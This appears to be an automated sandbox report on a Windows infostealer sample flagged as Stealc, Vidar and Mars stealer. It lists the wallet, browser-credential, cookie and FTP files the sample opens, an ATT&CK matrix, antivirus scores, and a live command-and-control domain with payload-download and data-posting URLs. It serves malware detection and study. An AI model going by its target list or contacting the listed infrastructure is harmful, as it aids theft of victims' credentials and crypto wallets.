                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: Process Memory Space: pYJeC4VJbw.exe PID: 6936, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Mars stealer
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.2c80e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.pYJeC4VJbw.exe.2cc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.pYJeC4VJbw.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Yara detected Stealc
                  Source: Yara matchFile source: 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pYJeC4VJbw.exe PID: 6936, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.2c80e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.pYJeC4VJbw.exe.2cc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pYJeC4VJbw.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.pYJeC4VJbw.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pYJeC4VJbw.exe PID: 6936, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D180D60 sqlite3_bind_parameter_name,0_2_6D180D60
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D180C40 sqlite3_bind_zeroblob,0_2_6D180C40
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D0A8EA0 sqlite3_clear_bindings,0_2_6D0A8EA0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_6D180B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,0_2_6D180B40

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Process Injection                  		1
                  Masquerading                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		21
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Virtualization/Sandbox Evasion                  		LSASS Memory21
                  Security Software Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		2
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Process Injection                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDS11
                  Process Discovery                  		Distributed Component Object ModelInput Capture4
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  Account Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing                  		Cached Domain Credentials1
                  System Owner/User Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync2
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem143
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  pYJeC4VJbw.exe66%ReversingLabsWin32.Trojan.Stealc
                  pYJeC4VJbw.exe46%VirustotalBrowse
                  pYJeC4VJbw.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\freebl3.dll0%ReversingLabs
                  C:\ProgramData\mozglue.dll0%ReversingLabs
                  C:\ProgramData\msvcp140.dll0%ReversingLabs
                  C:\ProgramData\nss3.dll0%ReversingLabs
                  C:\ProgramData\softokn3.dll0%ReversingLabs
                  C:\ProgramData\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  shaffatta.com0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://mozilla.org0/0%URL Reputationsafe
                  https://shaffatta.com/0%Avira URL Cloudsafe
                  https://shaffatta.com/JKEHDBGHIDHIEHDBAAFHJK0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll100%Avira URL Cloudmalware
                  https://shaffatta.com/fdca69ae739b4897.php0%Avira URL Cloudsafe
                  https://shaffatta.com/D0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.php4r#0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll100%Avira URL Cloudmalware
                  https://shaffatta.com/D9%VirustotalBrowse
                  https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll0%VirustotalBrowse
                  https://shaffatta.com/fdca69ae739b4897.php-0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.php12%VirustotalBrowse
                  https://shaffatta.com/ost:0%Avira URL Cloudsafe
                  https://shaffatta.com/8s/0%Avira URL Cloudsafe
                  https://shaffatta.com/fatta.com/32e011d2eaa85a0/nss3.dllY0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll12%VirustotalBrowse
                  https://shaffatta.com/fdca69ae739b4897.php&0%Avira URL Cloudsafe
                  https://shaffatta.com/0%VirustotalBrowse
                  https://shaffatta.com/fdca69ae739b4897.phpiYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosK0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.phpmple-storage.jsoncoOaY0%Avira URL Cloudsafe
                  https://shaffatta.com/)0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll80%Avira URL Cloudsafe
                  https://shaffatta.com/32e011d2eaa85a0/nss3.dllc0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.php&9%VirustotalBrowse
                  https://shaffatta.com/10%Avira URL Cloudsafe
                  https://shaffatta.com/50%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.php7s&0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll)0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllx0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.phpUs0%Avira URL Cloudsafe
                  https://shaffatta.com/511%VirustotalBrowse
                  https://shaffatta.com/d32e011d2eaa85a0/nss3.dll100%Avira URL Cloudmalware
                  https://cdn.epnacl0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.php8s/0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllH0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.phpa0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll100%Avira URL Cloudmalware
                  https://shaffatta.com/fdca69ae739b4897.phpys0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllF0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dlll0%Avira URL Cloudsafe
                  https://shaffatta.com/GHCGHCBFHJJKKJEHJEHJEH0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll100%Avira URL Cloudmalware
                  https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll7%VirustotalBrowse
                  https://shaffatta.com/d32e011d2eaa85a0/nss3.dll0%VirustotalBrowse
                  https://shaffatta.com/fdca69ae739b4897.phpa9%VirustotalBrowse
                  https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll100%Avira URL Cloudmalware
                  https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll0%VirustotalBrowse
                  https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dlll12%VirustotalBrowse
                  https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll7%VirustotalBrowse
                  https://shaffatta.com/ozglue.dll0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.phption:0%Avira URL Cloudsafe
                  https://shaffatta.com/es0%Avira URL Cloudsafe
                  https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dll0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.phpi0%Avira URL Cloudsafe
                  https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dll/0%Avira URL Cloudsafe
                  https://cdn.ep0%Avira URL Cloudsafe
                  https://shaffatta.com0%Avira URL Cloudsafe
                  https://shaffatta.com/Hs0%Avira URL Cloudsafe
                  https://shaffatta.com/c0%Avira URL Cloudsafe
                  https://shaffatta.com/fatta.com/0%Avira URL Cloudsafe
                  https://shaffatta.com/amData0%Avira URL Cloudsafe
                  https://shaffatta.com/3r:0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll100%Avira URL Cloudmalware
                  https://shaffatta.com/32e011d2eaa85a0/nss3.dll0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/nss3.dllp0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.phpGs0%Avira URL Cloudsafe
                  https://shaffatta.com/d32e011d2eaa85a0/nss3.dlln0%Avira URL Cloudsafe
                  https://shaffatta.com/fdca69ae739b4897.phpCoinomi0%Avira URL Cloudsafe
                  https://shaffatta.comC0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  shaffatta.com
                  		168.119.248.46
                  		truefalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://shaffatta.com/fdca69ae739b4897.phpfalse
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://shaffatta.com/d32e011d2eaa85a0/mozglue.dlltrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dllfalse
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://shaffatta.com/d32e011d2eaa85a0/nss3.dllfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://shaffatta.com/d32e011d2eaa85a0/freebl3.dllfalse
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dllfalse
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllfalse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabGIJKKKFC.0.drfalse
                    		high
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFIDAKJKEHDBGHIDHIEHDBAAFHJK.0.drfalse
                      		high
                      https://duckduckgo.com/ac/?q=GIJKKKFC.0.drfalse
                        		high
                        https://shaffatta.com/JKEHDBGHIDHIEHDBAAFHJKpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://shaffatta.com/DpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 9%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://shaffatta.com/pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://shaffatta.com/fdca69ae739b4897.php4r#pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmp, GIJKKKFC.0.drfalse
                          		high
                          https://shaffatta.com/fdca69ae739b4897.php-pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E09000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://shaffatta.com/ost:pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17pYJeC4VJbw.exe, 00000000.00000003.2585700635.000000002349D000.00000004.00000020.00020000.00000000.sdmp, pYJeC4VJbw.exe, 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            https://shaffatta.com/fatta.com/32e011d2eaa85a0/nss3.dllYpYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D410000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
